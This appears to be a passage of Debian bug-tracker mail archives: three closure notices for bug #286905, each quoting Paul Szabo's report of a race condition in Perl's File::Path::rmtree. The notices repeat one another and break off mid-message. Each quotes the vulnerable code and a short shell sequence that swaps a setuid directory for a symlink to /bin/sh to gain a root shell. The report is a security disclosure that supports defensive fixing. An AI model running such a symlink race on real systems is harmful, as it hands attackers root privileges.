Bug#286905: marked as done (perl-modules: File::Path::rmtree makes setuid)
Your message dated Fri, 09 Jan 2009 01:52:21 + with message-id e1ll6xt-0006a4...@ries.debian.org and subject line Bug#286905: fixed in perl 5.8.8-7etch5 has caused the Debian Bug report #286905, regarding perl-modules: File::Path::rmtree makes setuid to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 286905: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=286905 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: perl-modules Version: 5.6.1-8.7 Severity: critical File: /usr/share/perl/5.6.1/File/Path.pm Tags: security Justification: root security hole Noting USN-44-1 e.g. in http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0385.html I looked in perl-N.N.N/lib/File/Path.pm and noticed that rmtree contains a race condition, allowing creation of setuid files: 170 (undef, undef, my $rp) = lstat $root or next; 171 $rp = 0; # don't forget setuid, setgid, sticky bits 172 if ( -d _ ) { ... 209 if (rmdir $root) { 210 ++$count; 211 } 212 else { 213 carp Can't remove directory $root: $!; 214 chmod($rp, ($Is_VMS ? VMS::Filespec::fileify($root) : $root)) 215 or carp(and can't restore permissions to 216 . sprintf(0%o,$rp) . \n); 217 } 218 } ... Example of attack: suppose we know that root uses rmtree to clean up /tmp directories. Attacker prepares things: mkdir -p /tmp/psz/sh perl -e 'open F, /tmp/psz/sh/$_ foreach (1..1000)' chmod 4777 /tmp/psz/sh While root is busy working on /tmp/psz/sh (and this can be made as slow as we like), attacker does: mv /tmp/psz/sh /tmp/psz/dummy ln -s /bin/sh /tmp/psz/sh Root would have recorded the permissions of /tmp/psz/sh, but would restore it to /bin/sh. I am not sure if things can almost be fixed (for those architectures without $force_writeable) by enclosing the chmod($rp,...) line within if(!safe|$force_writeable){...}. Maybe it should be documented that rmtree must only be used if you can be sure to have exclusive access to the tree. (A few minutes ago I emailed the File::Path authors tim.bu...@ig.co.uk and bai...@newman.upenn.edu; Tim.Bunce bounced.) Cheers, Paul Szabo - p...@maths.usyd.edu.au http://www.maths.usyd.edu.au:8000/u/psz/ School of Mathematics and Statistics University of Sydney 2006 Australia -- System Information Debian Release: 3.0 Architecture: i386 Kernel: Linux pisa.maths.usyd.edu.au 2.4.22-smssvr1.5.3 #1 SMP Wed Jun 23 13:01:39 EST 2004 i686 Locale: LANG=C, LC_CTYPE=C Versions of packages perl-modules depends on: ii perl 5.6.1-8.7 Larry Wall's Practical Extraction ---End Message--- ---BeginMessage--- Source: perl Source-Version: 5.8.8-7etch5 We believe that the bug you reported is fixed in the latest version of perl, which is due to be installed in the Debian FTP archive: libcgi-fast-perl_5.8.8-7etch5_all.deb to pool/main/p/perl/libcgi-fast-perl_5.8.8-7etch5_all.deb libperl-dev_5.8.8-7etch5_i386.deb to pool/main/p/perl/libperl-dev_5.8.8-7etch5_i386.deb libperl5.8_5.8.8-7etch5_i386.deb to pool/main/p/perl/libperl5.8_5.8.8-7etch5_i386.deb perl-base_5.8.8-7etch5_i386.deb to pool/main/p/perl/perl-base_5.8.8-7etch5_i386.deb perl-debug_5.8.8-7etch5_i386.deb to pool/main/p/perl/perl-debug_5.8.8-7etch5_i386.deb perl-doc_5.8.8-7etch5_all.deb to pool/main/p/perl/perl-doc_5.8.8-7etch5_all.deb perl-modules_5.8.8-7etch5_all.deb to pool/main/p/perl/perl-modules_5.8.8-7etch5_all.deb perl-suid_5.8.8-7etch5_i386.deb to pool/main/p/perl/perl-suid_5.8.8-7etch5_i386.deb perl_5.8.8-7etch5.diff.gz to pool/main/p/perl/perl_5.8.8-7etch5.diff.gz perl_5.8.8-7etch5.dsc to pool/main/p/perl/perl_5.8.8-7etch5.dsc perl_5.8.8-7etch5_i386.deb to pool/main/p/perl/perl_5.8.8-7etch5_i386.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 286...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Niko Tyni nt...@debian.org (supplier of updated perl package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.7 Date: Thu, 20 Nov
Bug#286905: marked as done (perl-modules: File::Path::rmtree makes setuid)
Your message dated Thu, 27 Nov 2008 21:18:05 + with message-id [EMAIL PROTECTED] and subject line Bug#286905: fixed in perl 5.10.0-18 has caused the Debian Bug report #286905, regarding perl-modules: File::Path::rmtree makes setuid to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 286905: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=286905 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems ---BeginMessage--- Package: perl-modules Version: 5.6.1-8.7 Severity: critical File: /usr/share/perl/5.6.1/File/Path.pm Tags: security Justification: root security hole Noting USN-44-1 e.g. in http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0385.html I looked in perl-N.N.N/lib/File/Path.pm and noticed that rmtree contains a race condition, allowing creation of setuid files: 170 (undef, undef, my $rp) = lstat $root or next; 171 $rp = 0; # don't forget setuid, setgid, sticky bits 172 if ( -d _ ) { ... 209 if (rmdir $root) { 210 ++$count; 211 } 212 else { 213 carp Can't remove directory $root: $!; 214 chmod($rp, ($Is_VMS ? VMS::Filespec::fileify($root) : $root)) 215 or carp(and can't restore permissions to 216 . sprintf(0%o,$rp) . \n); 217 } 218 } ... Example of attack: suppose we know that root uses rmtree to clean up /tmp directories. Attacker prepares things: mkdir -p /tmp/psz/sh perl -e 'open F, /tmp/psz/sh/$_ foreach (1..1000)' chmod 4777 /tmp/psz/sh While root is busy working on /tmp/psz/sh (and this can be made as slow as we like), attacker does: mv /tmp/psz/sh /tmp/psz/dummy ln -s /bin/sh /tmp/psz/sh Root would have recorded the permissions of /tmp/psz/sh, but would restore it to /bin/sh. I am not sure if things can almost be fixed (for those architectures without $force_writeable) by enclosing the chmod($rp,...) line within if(!safe|$force_writeable){...}. Maybe it should be documented that rmtree must only be used if you can be sure to have exclusive access to the tree. (A few minutes ago I emailed the File::Path authors [EMAIL PROTECTED] and [EMAIL PROTECTED]; Tim.Bunce bounced.) Cheers, Paul Szabo - [EMAIL PROTECTED] http://www.maths.usyd.edu.au:8000/u/psz/ School of Mathematics and Statistics University of Sydney 2006 Australia -- System Information Debian Release: 3.0 Architecture: i386 Kernel: Linux pisa.maths.usyd.edu.au 2.4.22-smssvr1.5.3 #1 SMP Wed Jun 23 13:01:39 EST 2004 i686 Locale: LANG=C, LC_CTYPE=C Versions of packages perl-modules depends on: ii perl 5.6.1-8.7 Larry Wall's Practical Extraction ---End Message--- ---BeginMessage--- Source: perl Source-Version: 5.10.0-18 We believe that the bug you reported is fixed in the latest version of perl, which is due to be installed in the Debian FTP archive: libcgi-fast-perl_5.10.0-18_all.deb to pool/main/p/perl/libcgi-fast-perl_5.10.0-18_all.deb libperl-dev_5.10.0-18_i386.deb to pool/main/p/perl/libperl-dev_5.10.0-18_i386.deb libperl5.10_5.10.0-18_i386.deb to pool/main/p/perl/libperl5.10_5.10.0-18_i386.deb perl-base_5.10.0-18_i386.deb to pool/main/p/perl/perl-base_5.10.0-18_i386.deb perl-debug_5.10.0-18_i386.deb to pool/main/p/perl/perl-debug_5.10.0-18_i386.deb perl-doc_5.10.0-18_all.deb to pool/main/p/perl/perl-doc_5.10.0-18_all.deb perl-modules_5.10.0-18_all.deb to pool/main/p/perl/perl-modules_5.10.0-18_all.deb perl-suid_5.10.0-18_i386.deb to pool/main/p/perl/perl-suid_5.10.0-18_i386.deb perl_5.10.0-18.diff.gz to pool/main/p/perl/perl_5.10.0-18.diff.gz perl_5.10.0-18.dsc to pool/main/p/perl/perl_5.10.0-18.dsc perl_5.10.0-18_i386.deb to pool/main/p/perl/perl_5.10.0-18_i386.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Niko Tyni [EMAIL PROTECTED] (supplier of updated perl package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Fri, 21 Nov 2008 00:49:57 +0200 Source: perl Binary: perl-base libcgi-fast-perl perl-doc perl-modules perl-debug perl-suid
Bug#286905: marked as done (perl-modules: File::Path::rmtree makes setuid)
Your message dated Mon, 07 Mar 2005 01:47:15 -0500 with message-id [EMAIL PROTECTED] and subject line Bug#286905: fixed in perl 5.8.4-7 has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) -- Received: (at submit) by bugs.debian.org; 22 Dec 2004 22:11:05 + From [EMAIL PROTECTED] Wed Dec 22 14:11:05 2004 Return-path: [EMAIL PROTECTED] Received: from talus.maths.usyd.edu.au [129.78.68.1] by spohr.debian.org with esmtp (Exim 3.35 1 (Debian)) id 1ChEhE-00048l-00; Wed, 22 Dec 2004 14:11:04 -0800 Received: from pisa.maths.usyd.edu.au ([EMAIL PROTECTED]) [129.78.69.136] by siv.maths.usyd.edu.au via smtpdoor V18.4 id 309156 for [EMAIL PROTECTED]; Thu, 23 Dec 2004 09:10:31 +1100 Message-Id: [EMAIL PROTECTED] Received: from [EMAIL PROTECTED] by pisa.maths.usyd.edu.au (8.12.3/8.1/Submit) id iBMMAV7n010381; Thu, 23 Dec 2004 09:10:31 +1100 From: Paul Szabo [EMAIL PROTECTED] To: Debian Bug Tracking System [EMAIL PROTECTED] Subject: perl-modules: File::Path::rmtree makes setuid X-Mailer: reportbug 1.50 Date: Thu, 23 Dec 2004 09:10:31 +1100 Delivered-To: [EMAIL PROTECTED] X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2004_03_25 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Status: No, hits=-5.9 required=4.0 tests=BAYES_00,HAS_PACKAGE, MSGID_FROM_MTA_HEADER,WEIRD_PORT autolearn=no version=2.60-bugs.debian.org_2004_03_25 X-Spam-Level: Package: perl-modules Version: 5.6.1-8.7 Severity: critical File: /usr/share/perl/5.6.1/File/Path.pm Tags: security Justification: root security hole Noting USN-44-1 e.g. in http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0385.html I looked in perl-N.N.N/lib/File/Path.pm and noticed that rmtree contains a race condition, allowing creation of setuid files: 170 (undef, undef, my $rp) = lstat $root or next; 171 $rp = 0; # don't forget setuid, setgid, sticky bits 172 if ( -d _ ) { ... 209 if (rmdir $root) { 210 ++$count; 211 } 212 else { 213 carp Can't remove directory $root: $!; 214 chmod($rp, ($Is_VMS ? VMS::Filespec::fileify($root) : $root)) 215 or carp(and can't restore permissions to 216 . sprintf(0%o,$rp) . \n); 217 } 218 } ... Example of attack: suppose we know that root uses rmtree to clean up /tmp directories. Attacker prepares things: mkdir -p /tmp/psz/sh perl -e 'open F, /tmp/psz/sh/$_ foreach (1..1000)' chmod 4777 /tmp/psz/sh While root is busy working on /tmp/psz/sh (and this can be made as slow as we like), attacker does: mv /tmp/psz/sh /tmp/psz/dummy ln -s /bin/sh /tmp/psz/sh Root would have recorded the permissions of /tmp/psz/sh, but would restore it to /bin/sh. I am not sure if things can almost be fixed (for those architectures without $force_writeable) by enclosing the chmod($rp,...) line within if(!safe|$force_writeable){...}. Maybe it should be documented that rmtree must only be used if you can be sure to have exclusive access to the tree. (A few minutes ago I emailed the File::Path authors [EMAIL PROTECTED] and [EMAIL PROTECTED]; Tim.Bunce bounced.) Cheers, Paul Szabo - [EMAIL PROTECTED] http://www.maths.usyd.edu.au:8000/u/psz/ School of Mathematics and Statistics University of Sydney 2006 Australia -- System Information Debian Release: 3.0 Architecture: i386 Kernel: Linux pisa.maths.usyd.edu.au 2.4.22-smssvr1.5.3 #1 SMP Wed Jun 23 13:01:39 EST 2004 i686 Locale: LANG=C, LC_CTYPE=C Versions of packages perl-modules depends on: ii perl 5.6.1-8.7 Larry Wall's Practical Extraction --- Received: (at 286905-close) by bugs.debian.org; 7 Mar 2005 06:53:04 + From [EMAIL PROTECTED] Sun Mar 06 22:53:04 2005 Return-path: [EMAIL PROTECTED] Received: from newraff.debian.org [208.185.25.31] (mail) by spohr.debian.org with esmtp (Exim 3.35 1 (Debian)) id 1D8C6y-XC-00; Sun, 06 Mar 2005 22:53:04 -0800 Received: from katie by newraff.debian.org with local (Exim 3.35 1 (Debian)) id 1D8C1L-0001OJ-00; Mon, 07 Mar 2005 01:47:15 -0500 From: Brendan O'Dea [EMAIL PROTECTED] To: [EMAIL PROTECTED] X-Katie: $Revision: 1.55 $ Subject: Bug#286905: fixed in perl 5.8.4-7 Message-Id: [EMAIL PROTECTED] Sender: Archive Administrator [EMAIL PROTECTED] Date: